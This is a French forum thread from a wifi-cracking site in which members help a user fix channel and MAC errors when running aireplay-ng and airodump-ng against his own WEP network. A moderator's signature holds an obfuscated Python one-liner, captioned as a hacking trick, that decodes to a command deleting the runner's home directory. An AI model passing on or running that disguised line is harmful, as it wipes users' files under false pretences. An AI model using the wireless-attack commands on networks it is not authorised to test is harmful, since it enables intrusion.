Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 28-02-2014 12:57:15

redwan
Membre Hyperactif

Invalid destination MAC adress

Yep smile, désolé si le sujet à déja été abordé mais j'ai cherché par moi même sans trouver de réponse.

Quand je teste sur mon reseau passé en WEP provisoirement

aireplay-ng --fakeauth 30 -a [addr mac ap] mon0

d'abord il me dit "no source MAC specified" et " mon0 is channel 12, but the AP uses channel 6 " donc fais ce qu'il me demande :

donc je spécifie mon adresse MAC mais je ne sais pas comment passer mon interface sur le canal 6 ..

J'ai tenté de mettre -ch 6 mais il me renvoi " Invalid destination MAC adress "

je ne comprends pas trop, sur le net il parle de patch mais je ne suis pas sûr de ce que je fais donc si vous avez des idées?

Merci

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 28-02-2014 14:14:46

spawn
Modérateur

Re : Invalid destination MAC adress

Donne nous l'adresse mac que tu as utilisée.
Il y en a qui ne sont pas valides, utilisées pour faire un équivalent de routage réseau primitif.
http://www.iana.org/assignments/etherne … bers.xhtml

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 28-02-2014 15:05:42

FFOO31
Membre d'Or

tu doit bloquer ton canal dans la commande
airodump-ng -c CANAL --bssid MAC AP -w FICHIER.OUT mon0

et apres tu lance la commande de l'association

aireplay-ng -1 0 -a MAC AP -h TON MAC mon0

#4 28-02-2014 16:15:20

redwan
Membre Hyperactif

Non mais enfaite c'est bon smile FFOO31 avait raison, j'utilisais un autre PC pour simuler davantage de trafic et sur l'autre cette commande ne fonctionnait pas car je ne tapais pas cette commande airodump-ng -c CANAL --bssid MAC AP -w FICHIER.OUT mon0

Merci pour l'astuce smile

#5 28-02-2014 17:02:01

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Pour compléter la réponse de FFOO31, tu peux voir que le message d'erreur te donnes une information type

" mon0 is channel 12, but the AP uses channel 6 "

Lorsque tu obtiens ce types d'erreur, il y a deux solutions très simples

1 - indiquer le canal dans ta commande
     2 - Si cela ne suffit pas : - désactiver le mode monitor ( airmon-ng stop monX )
                                         - baisser l'interface wlan ( ifconfig wlanX down )
                                         - activer le mode monitor ( airmon-ng start wlanX )
                                         - baisser l'interface wlan ( ifconfig wlanX down )

Ainsi tu es sûr que lorsque tu lanceras ta commande dans un canal spécifique elle s'effectuera bien dans ce canal.

#6 28-02-2014 17:22:42

redwan
Membre Hyperactif

Heu j'ai manipulé un peu le ifconfig wlanX down et le service network stop et maintenant je n'ai plus rien du tout quand je tape airmon-ng ..
Sachant que j'ai redemarer mon pc plusieurs fois etc ça ne fonctionne plus là hmm une soluce ?

EDIT: je revois mes interfaces wlan0 et mon0 mais quand j'utilise airodump ou wash je ne detecte plus de reseaux ..

pour info j'utilise kali linux sous linux avec virtual box

EDIT2: C'est bon enfaîte il fallait que je réactive le reseau également sur mon PC sous ubuntu .. Oo

Dernière modification par redwan (28-02-2014 17:53:37)

#7 28-02-2014 17:48:29

kcdtv
Membre d'honneur
Lieu : Internacionaluña

mets nous des copiés complets de tout ce qui se passe en console surtout lorsque tu manipules les interfaces wink
Donnes nous aussi le résultat de

lsusb

et

iwconfig

#8 03-03-2014 01:25:34

redwan
Membre Hyperactif

Non non mais c'est bon c'était une erreur de ma part .. Je crois qu'enfaite mon défaut est d'être trop impatient smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]